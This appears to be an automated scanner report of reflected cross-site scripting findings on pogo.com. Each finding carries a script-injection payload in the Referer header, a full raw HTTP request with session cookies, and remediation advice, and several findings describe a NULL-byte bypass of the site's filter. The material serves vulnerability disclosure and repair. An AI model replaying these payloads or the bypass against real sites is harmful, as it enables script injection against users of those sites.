The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3627</script><script>alert(1)</script>7d4bd838e4e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account/verify-password.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a3627</script><script>alert(1)</script>7d4bd838e4e Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536393024-New%7C1297128393024%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dcc</script><script>alert(1)</script>48280d89769 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/confirmation.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a4dcc</script><script>alert(1)</script>48280d89769 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 743ee</script><script>alert(1)</script>ff787b7638f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=homnav_register HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=743ee</script><script>alert(1)</script>ff787b7638f Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936a3</script><script>alert(1)</script>e61f16ca4d92068c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/lightreg.do?site=pogo&screenname=k7240&password=Dunno1&password_confirm=Dunno1&gender=F&birth_month=1&birth_day=1&birth_year=1970&country=US&email=test%40fastdial.net&lightreg_newword=0&wordverresponse=ckgwjx&accept=Accept HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=936a3</script><script>alert(1)</script>e61f16ca4d92068c9 Cache-Control: max-age=0 Origin: http://www.pogo.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e92</script><script>alert(1)</script>ea0af40b809 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/lightregview.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=c9e92</script><script>alert(1)</script>ea0af40b809 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536332622-New%7C1297128332622%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65815</script><script>alert(1)</script>fc1dcdbed34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_right_button HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: 65815</script><script>alert(1)</script>fc1dcdbed34 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536548428-New%7C1297128548428%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a6d4a</script>c47abe2abdf was submitted in the Referer HTTP header. This input was echoed as a6d4a</script>c47abe2abdf in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /all-games HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%00a6d4a</script>c47abe2abdf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a15ff</script><a>6209259dd1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /board-games?pageSection=footer_board HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=a15ff</script><a>6209259dd1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0015f3c</script><script>alert(1)</script>bb5b1d82243 was submitted in the Referer HTTP header. This input was echoed as 15f3c</script><script>alert(1)</script>bb5b1d82243 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /board-games?pageSection=categorybar_board HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%0015f3c</script><script>alert(1)</script>bb5b1d82243
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea44</script><script>alert(1)</script>6b50ceea4b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c8dc</script><script>alert(1)</script>5714e91b8bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/home.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4c8dc</script><script>alert(1)</script>5714e91b8bb
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c590</script><script>alert(1)</script>6d39ca2b1f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=8c590</script><script>alert(1)</script>6d39ca2b1f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7be6</script><script>alert(1)</script>279ffb5215 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=c7be6</script><script>alert(1)</script>279ffb5215
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f536</script><script>alert(1)</script>b87bcf0ce7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphone HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=9f536</script><script>alert(1)</script>b87bcf0ce7f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0766</script><script>alert(1)</script>1623b3caefc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
